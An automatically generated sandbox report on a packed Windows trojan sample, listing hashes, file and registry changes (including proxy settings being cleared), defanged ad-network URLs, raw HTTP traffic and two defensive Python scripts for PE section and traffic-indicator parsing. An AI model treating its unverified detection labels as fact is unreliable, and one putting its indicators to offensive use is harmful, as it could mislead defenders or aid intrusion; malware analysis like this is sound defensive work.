Gen.Variant.Strictor.58115_c0c73eaf2b

by malwarelabrobot on September 14th, 2014 in Malware Descriptions.

Gen:Variant.Strictor.58115 (B) (Emsisoft), Gen:Variant.Strictor.58115 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm


The description has been automatically generated by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.


MD5: c0c73eaf2bb3a41131599a1eb447f1e7
SHA1: 6d0ae3f5741f5c8f3c4a7aafcbfae56e7c9bcb6e
SHA256: 75369d0327c1ac86a2c900d47d1e31f838120feb941fd356ab6740ff23786546
SSDeep: 24576:RUz67U0SHuQpjuC9GWbjEdl2CLS54HpQTrv762jGkINf4:RXCFj2X2qHpQb9CP
Size: 1560576 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: VenusApp Software
Created at: 2014-03-18 04:44:09
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-PSW: a Trojan program intended for stealing users' passwords.

Payload

Behaviour Description
EmailWorm: a worm that can send e-mails.

These labels come from the vendor detection names listed above, not from the run recorded below. The dynamic analysis captured only HTTP traffic issued through the WinInet/Internet Explorer stack (IE 6 User-Agent, Content.IE5 cache writes, Wininet* mutexes) to www.cf089.com, a parked domain that loads ad-network scripts, plus one dropped DLL (C:\SkinH_EL.dll); this report records no SMTP traffic and nothing that looks like credential theft. The requested page name ³É¹¦ÐÅÏ¢.html is the GBK string 成功信息 ("success message") rendered as Latin-1.


Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:664

The only process listed is the sample's own (PID 664): the run recorded no child processes and no injection into another process, so all file, registry and network activity below belongs to %original file name%.exe itself.

Mutexes

The following mutexes were created/opened:

CTF.TMD.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Layouts.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Asm.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Compart.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.LBES.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
RasPbFile
ShimCacheMutex

File activity

The process %original file name%.exe:664 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bd_bg[1].gif (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CA98G7TP.html (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\³É¹¦ÐÅÏ¢[1].htm (943 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\slave[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CACDY72N.html?partner=bd3 (621 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\³É¹¦ÐÅÏ¢[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\domains[1].js (7262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\CAC9KN0N.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\t_141_201401111[1].css (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\parking_caf_141_1402251[1].js (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\secondtier_caf[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\slave[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\caf[1].js (258 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\CARY3VYG.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\caf[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\³É¹¦ÐÅÏ¢[1].htm (761 bytes)
C:\SkinH_EL.dll (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\search_language_1[1].jpg (2 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\slave[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CA98G7TP.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\slave[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\caf[1].gif (0 bytes)

Registry activity

The process %original file name%.exe:664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1024x768x32(BGR 0)" = "31,31,31,31"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 04 6E 69 89 F7 03 29 59 39 02 20 20 AF 60 D2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan sets the Internet Explorer security-zone flag that maps UNC paths (\\server\share) to the Local Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

It sets the flag that maps all sites which bypass the proxy server to the Local Intranet zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

It sets the flag that maps local (dotless) host names not assigned to any other zone to the Local Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

These three ZoneMap values are Internet Explorer's standard "Local intranet" site-detection options and are routinely written when the WinInet/urlmon stack is first used from a profile; on their own they are a weak indicator, as are the Cache\Paths and Shell Folders values above. The deletion of the proxy values listed next, together with ProxyEnable = 0, is what actually changes the host's outbound path.

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
147127382e001f495d1842ee7a9e7912 c:\SkinH_EL.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name    Virtual Address  Virtual Size  Raw Size  Entropy   Section MD5
.text      4096           584183             0   0         d41d8cd98f00b204e9800998ecf8427e
.rdata   589824          1187126             0   0         d41d8cd98f00b204e9800998ecf8427e
.data   1777664           317066             0   0         d41d8cd98f00b204e9800998ecf8427e
.rsrc   2097152           111928         98304   3.10511   3f3991c2d82ce214f293326a5d8d5c59
.vmp0   2211840            16456             0   0         d41d8cd98f00b204e9800998ecf8427e
.vmp1   2232320          1450954       1454080   5.45551   ac8d8c815aaeee74b7b73dda68b0afa4
.reloc  3686400               92          4096   0.125139  b40486e21d34f58b8e5be6e592a26b38

Four sections (.text, .rdata, .data, .vmp0) have a raw size of 0 and the MD5 of empty input (d41d8cd98f00b204e9800998ecf8427e): their contents exist only in memory after the unpacking stub has run. The .vmp0/.vmp1 section names are the ones VMProtect creates, which matches the "Packed" entropy verdict above, and .vmp1 holds almost all of the on-disk bytes (about 1.45 MB of the 1.56 MB file). Static string or import analysis of the file on disk will therefore see little; a memory dump taken after unpacking is needed.
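The section profile above can be checked mechanically. The Python script below is an added example written for this page; it is not part of the Lavasoft report and does not touch the real sample. It parses a PE section table with only the standard library, computes each section's on-disk entropy, and flags the two patterns in the table: standard sections with zero raw size and VMProtect's .vmp* sections. The PE it runs on is a constructed stub whose section headers copy the virtual sizes and addresses from the table; its .vmp1 payload is pseudo-random filler, so its entropy (close to 8) is higher than the 5.46 recorded for the real .vmp1.

```python
"""Parse a PE section table and flag the runtime-unpacking profile seen in the report."""
import math
import random
import struct
from collections import Counter

SECTION_HEADER = struct.Struct("<8sIIIIIIHHI")  # IMAGE_SECTION_HEADER, 40 bytes


def shannon_entropy(data):
    """Bits of entropy per byte; 0.0 for empty input, as in the report's table."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(image):
    """Walk the section table of a PE image held in memory (bytes).

    Only the fields needed to locate the table are read, so the optional
    header may be anything (it is all zeros in the constructed sample)."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", image, 0x3C)[0]          # e_lfanew
    if image[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    nsections = struct.unpack_from("<H", image, pe_off + 6)[0]  # NumberOfSections
    opt_size = struct.unpack_from("<H", image, pe_off + 20)[0]  # SizeOfOptionalHeader
    table = pe_off + 24 + opt_size
    sections = []
    for i in range(nsections):
        fields = SECTION_HEADER.unpack_from(image, table + i * SECTION_HEADER.size)
        name, vsize, vaddr, rsize, rptr = fields[:5]
        raw = image[rptr:rptr + rsize] if rsize else b""
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "vaddr": vaddr, "vsize": vsize, "rsize": rsize,
            "entropy": round(shannon_entropy(raw), 3),
        })
    return sections


def packer_indicators(sections):
    """Flag standard sections that exist only virtually (raw size 0, filled at
    runtime) and VMProtect's .vmp* sections."""
    findings = []
    for s in sections:
        if s["rsize"] == 0 and s["vsize"] > 0 and s["name"] in (".text", ".rdata", ".data"):
            findings.append(f"{s['name']}: {s['vsize']} bytes virtual, 0 on disk (materialised at runtime)")
        if s["name"].startswith(".vmp"):
            findings.append(f"{s['name']}: VMProtect section, entropy {s['entropy']}")
    return findings


def build_sample_pe():
    """Constructed minimal PE (NOT the analysed sample): the report's layout with
    three zero-raw-size sections and one .vmp1 section of 4 KiB random filler."""
    rng = random.Random(1)
    payload = bytes(rng.getrandbits(8) for _ in range(4096))
    layout = [  # name, VirtualSize, VirtualAddress, SizeOfRawData
        (b".text", 584183, 0x1000, 0),
        (b".rdata", 1187126, 0x90000, 0),
        (b".data", 317066, 0x1B2000, 0),
        (b".vmp1", len(payload), 0x221000, len(payload)),
    ]
    pe_off, opt_size = 0x40, 0xE0          # PE header at 0x40, PE32 optional header size
    table = pe_off + 24 + opt_size
    data_start = table + len(layout) * SECTION_HEADER.size
    img = bytearray(data_start)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, pe_off)
    img[pe_off:pe_off + 4] = b"PE\0\0"
    struct.pack_into("<H", img, pe_off + 6, len(layout))
    struct.pack_into("<H", img, pe_off + 20, opt_size)
    for i, (name, vsize, vaddr, rsize) in enumerate(layout):
        rptr = data_start if rsize else 0
        SECTION_HEADER.pack_into(img, table + i * SECTION_HEADER.size,
                                 name.ljust(8, b"\0"), vsize, vaddr, rsize, rptr, 0, 0, 0, 0, 0)
    return bytes(img) + payload


if __name__ == "__main__":
    for line in packer_indicators(parse_sections(build_sample_pe())):
        print(line)
```

To run it against a real file, replace build_sample_pe() with open(path, "rb").read(). Any .text/.rdata/.data entry that is flagged means the disk image does not contain the real code, so strings and imports must be taken from a memory dump after unpacking.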

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://a1.dnbizcdn.com/css/t_141_201401111.css 205.164.14.75
hxxp://www.google.com/adsense/domains/caf.js 173.194.39.114
hxxp://www.google.com/ads/search/module/ads/1.0/76529756bd9c4808112d3445d4a637b160b572c9/n/domains.js 173.194.39.114
hxxp://a1.dnbizcdn.com/js/parking_caf_141_1402251.js 205.164.14.75
hxxp://a1.dnbizcdn.com/img/w300/search_language_1.jpg 205.164.14.75
hxxp://cdn.dopa.com.wscdns.com/img/w300/bd_bg.gif 60.191.14.54
hxxp://www.gstatic.com/domainads/tracking/caf.gif?ts=1410575496766&rid=1445466 173.194.39.119
hxxp://pagead.l.doubleclick.net/static/caf/slave.html
hxxp://pagead.l.doubleclick.net/apps/domainpark/domainpark.cgi?max_radlink_len=20&r=m&fexp=21404&client=dp-dopa15_3ph_js&channel=001623&hl=ru&adtest=off&type=0&optimize_terms=on&drid=as-drid-2246028460856896&uiopt=false&oe=UTF-8&ie=UTF-8&format=p6|r24|r12|s&ad=a6&adrep=2&num=0&output=caf&domain_name=www.cf089.com&v=3&allwcallad=1&adext=as1,sr1,ctc1&cd_oi=true&u_his=0&u_tz=180&dt=1410575496813&u_w=1024&u_h=768&biw=292&bih=140&psw=1020&psh=312&frm=0&uio=uv3cs1fa2sa20sl1sr1cc1-af3wi1000ff1st24sd12sv11sa12lt40ld40lv30-wi1010ff1st16sa12lt38-wi1010ff1st16sa12lt38-&rurl=http://www.cf089.com/³É¹¦ÐÅÏ¢.html
hxxp://cdn.dopa.com.wscdns.com/js/secondtier_caf.js 60.191.14.54
hxxp://65.19.157.196/³É¹¦ÐÅÏ¢.html?partner=bd3
hxxp://www.gstatic.com/domainads/tracking/caf.gif?ts=1410575497829&rid=6549563 173.194.39.119
hxxp://pagead.l.doubleclick.net/apps/domainpark/domainpark.cgi?max_radlink_len=20&r=m&fexp=21404&client=dp-dopa15_3ph_js&channel=001623&hl=ru&adtest=off&type=0&optimize_terms=on&drid=as-drid-2246028460856896&uiopt=false&oe=UTF-8&ie=UTF-8&format=p6|r24|r12|s&ad=a6&adrep=2&num=0&output=caf&domain_name=www.cf089.com&v=3&allwcallad=1&adext=as1,sr1,ctc1&cd_oi=true&u_his=1&u_tz=180&dt=1410575497844&u_w=1024&u_h=768&biw=292&bih=140&psw=1020&psh=312&frm=0&uio=uv3cs1fa2sa20sl1sr1cc1-af3wi1000ff1st24sd12sv11sa12lt40ld40lv30-wi1010ff1st16sa12lt38-wi1010ff1st16sa12lt38-&rurl=http://www.cf089.com/³É¹¦ÐÅÏ¢.html?partner=bd3
hxxp://65.19.157.196/³É¹¦ÐÅÏ¢.html?partner=bd3&sac=&format=json&oc=false&uc=undefined
hxxp://cdn.dopa.com/js/secondtier_caf.js 60.191.14.54
hxxp://dp.g.doubleclick.net/apps/domainpark/domainpark.cgi?max_radlink_len=20&r=m&fexp=21404&client=dp-dopa15_3ph_js&channel=001623&hl=ru&adtest=off&type=0&optimize_terms=on&drid=as-drid-2246028460856896&uiopt=false&oe=UTF-8&ie=UTF-8&format=p6|r24|r12|s&ad=a6&adrep=2&num=0&output=caf&domain_name=www.cf089.com&v=3&allwcallad=1&adext=as1,sr1,ctc1&cd_oi=true&u_his=0&u_tz=180&dt=1410575496813&u_w=1024&u_h=768&biw=292&bih=140&psw=1020&psh=312&frm=0&uio=uv3cs1fa2sa20sl1sr1cc1-af3wi1000ff1st24sd12sv11sa12lt40ld40lv30-wi1010ff1st16sa12lt38-wi1010ff1st16sa12lt38-&rurl=http://www.cf089.com/³É¹¦ÐÅÏ¢.html 173.194.39.90
hxxp://dp.g.doubleclick.net/apps/domainpark/domainpark.cgi?max_radlink_len=20&r=m&fexp=21404&client=dp-dopa15_3ph_js&channel=001623&hl=ru&adtest=off&type=0&optimize_terms=on&drid=as-drid-2246028460856896&uiopt=false&oe=UTF-8&ie=UTF-8&format=p6|r24|r12|s&ad=a6&adrep=2&num=0&output=caf&domain_name=www.cf089.com&v=3&allwcallad=1&adext=as1,sr1,ctc1&cd_oi=true&u_his=1&u_tz=180&dt=1410575497844&u_w=1024&u_h=768&biw=292&bih=140&psw=1020&psh=312&frm=0&uio=uv3cs1fa2sa20sl1sr1cc1-af3wi1000ff1st24sd12sv11sa12lt40ld40lv30-wi1010ff1st16sa12lt38-wi1010ff1st16sa12lt38-&rurl=http://www.cf089.com/³É¹¦ÐÅÏ¢.html?partner=bd3 173.194.39.90
hxxp://cdn.dopa.com/img/w300/bd_bg.gif 60.191.14.54
hxxp://www.cf089.com/³É¹¦ÐÅÏ¢.html?partner=bd3&sac=&format=json&oc=false&uc=undefined
hxxp://www.cf089.com/³É¹¦ÐÅÏ¢.html?partner=bd3
hxxp://dp.g.doubleclick.net/static/caf/slave.html 173.194.39.90
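The requests in the Traffic section are easier to pivot on once they are turned back into plain URLs. The Python script below is an added example for this page, not part of the Lavasoft report: it parses the report's request/response dump layout (request line, headers, blank line, status line), undoes the sandbox's defanging (hXXp:// for http:// and VVV. for www.), pairs each request with the status of the response that follows it, and decodes the GBK page name that the report renders as ³É¹¦ÐÅÏ¢ (成功信息). The embedded traffic is a constructed two-request sample in the report's layout; the hosts, paths, cookie and IE 6 User-Agent are copied from the Traffic section and the bodies are omitted.

```python
"""Turn the sandbox Traffic dump into refanged URLs, hosts and status codes."""
import re

REQUEST_LINE = re.compile(r"^(GET|POST|HEAD) (\S+) HTTP/1\.[01]$")
STATUS_LINE = re.compile(r"^HTTP/1\.[01] (\d{3})\b")

# Constructed sample in the report's dump layout (bodies omitted). The second
# request path is the report's mojibake name, written as \u escapes:
# \u00b3\u00c9\u00b9\u00a6\u00d0\u00c5\u00cf\u00a2 is the Latin-1 rendering of GBK 成功信息.
SAMPLE_TRAFFIC = """GET /img/w300/bd_bg.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.cf089.com/.........html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: cdn.dopa.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine/1.4.2
Content-Type: image/gif
Content-Length: 72
GIF89a...


GET /\u00b3\u00c9\u00b9\u00a6\u00d0\u00c5\u00cf\u00a2.html?partner=bd3 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.cf089.com
Connection: Keep-Alive
Cookie: PHPSESSID=d3r5ad3q9eou8nijgqkicflis1


HTTP/1.1 404 Not Found
Server: Tengine/1.4.2
Content-Type: text/html;charset=utf-8
X-Powered-By: PHP/5.3.10
"""


def refang(text):
    """Undo the sandbox defanging so the strings become real URLs again."""
    return (text.replace("hXXps://", "https://")
                .replace("hXXp://", "http://")
                .replace("VVV.", "www."))


def decode_gbk_mojibake(text):
    """Re-read Latin-1-rendered characters as GBK bytes. Strings that contain
    non-Latin-1 characters or are not valid GBK are returned unchanged."""
    try:
        return text.encode("latin-1").decode("gbk")
    except (UnicodeEncodeError, UnicodeDecodeError):
        return text


def parse_traffic(dump):
    """Build one record per request: a request line opens it, the next status
    line closes it and supplies the status code; response headers and the
    binary body residue are ignored."""
    records, current = [], None
    for raw in dump.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = REQUEST_LINE.match(line)
        if m:
            current = {"method": m.group(1), "path": m.group(2),
                       "headers": {}, "status": None}
            records.append(current)
            continue
        m = STATUS_LINE.match(line)
        if m:
            if current is not None:
                current["status"] = int(m.group(1))
            current = None
            continue
        if current is not None and ":" in line:
            name, _, value = line.partition(":")
            current["headers"][name.strip().lower()] = value.strip()
    return records


def request_url(record):
    """Rebuild the absolute URL from the Host header and the request path."""
    host = refang(record["headers"].get("host", ""))
    return "http://" + host + decode_gbk_mojibake(record["path"])


def summarize(dump):
    """IOC view of a dump: URLs, hosts, status codes, user agents and cookies."""
    records = parse_traffic(dump)
    return {
        "urls": [request_url(r) for r in records],
        "hosts": sorted({refang(r["headers"].get("host", "")) for r in records}),
        "status": [r["status"] for r in records],
        "user_agents": sorted({r["headers"].get("user-agent", "") for r in records}),
        "cookies": sorted(r["headers"]["cookie"] for r in records if "cookie" in r["headers"]),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_TRAFFIC).items():
        print(key, value)
```

Feeding the whole Traffic section to summarize() gives the host list for blocking and the decoded URLs in one pass; the GBK decode is deliberately conservative so that paths which are plain ASCII, or which are not valid GBK, pass through untouched.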


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /img/w300/bd_bg.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.cf089.com/.........html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn.dopa.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine/1.4.2
Date: Sat, 13 Sep 2014 02:31:36 GMT
Content-Type: image/gif
Content-Length: 72
Last-Modified: Sat, 07 Dec 2013 07:50:12 GMT
Connection: keep-alive
Accept-Ranges: bytes
[72-byte GIF image body not shown]



GET /js/secondtier_caf.js HTTP/1.1

Accept: */*
Referer: hXXp://VVV.cf089.com/.........html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn.dopa.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine/1.4.2
Date: Sat, 13 Sep 2014 02:31:36 GMT
Content-Type: application/x-javascript
Last-Modified: Wed, 25 Dec 2013 08:26:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
[gzip-compressed JavaScript body not shown]


GET /domainads/tracking/caf.gif?ts=1410575496766&rid=1445466 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.cf089.com/.........html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.gstatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Fri, 01 Jun 2012 22:49:22 GMT
Date: Sat, 13 Sep 2014 02:31:36 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 43
X-XSS-Protection: 1; mode=block
Alternate-Protocol: 80:quic,p=0.002
[43-byte GIF tracking-pixel body not shown]



GET /domainads/tracking/caf.gif?ts=1410575497829&rid=6549563 HTTP/1.1

Accept: */*
Referer: hXXp://VVV.cf089.com/.........html?partner=bd3
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.gstatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Fri, 01 Jun 2012 22:49:22 GMT
Date: Sat, 13 Sep 2014 02:31:37 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 43
X-XSS-Protection: 1; mode=block
Alternate-Protocol: 80:quic,p=0.002
[43-byte GIF tracking-pixel body not shown]


GET /³É¹¦ÐÅÏ¢.html?partner=bd3 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cf089.com
Connection: Keep-Alive
Cookie: PHPSESSID=d3r5ad3q9eou8nijgqkicflis1


HTTP/1.1 404 Not Found
Server: Tengine/1.4.2
Date: Sat, 13 Sep 2014 02:31:36 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
[gzip-compressed 404 page body not shown]

<<< skipped >>>

GET /³É¹¦ÐÅÏ¢.html?partner=bd3&sac=&format=json&oc=false&uc=undefined HTTP/1.1

Accept: */*
Referer: hXXp://VVV.cf089.com/.........html?partner=bd3
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cf089.com
Connection: Keep-Alive
Cookie: PHPSESSID=d3r5ad3q9eou8nijgqkicflis1


HTTP/1.1 404 Not Found
Server: Tengine/1.4.2
Date: Sat, 13 Sep 2014 02:31:37 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
[gzip-compressed 404 page body not shown]

<<< skipped >>>

GET /static/caf/slave.html HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: hXXp://VVV.cf089.com/.........html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
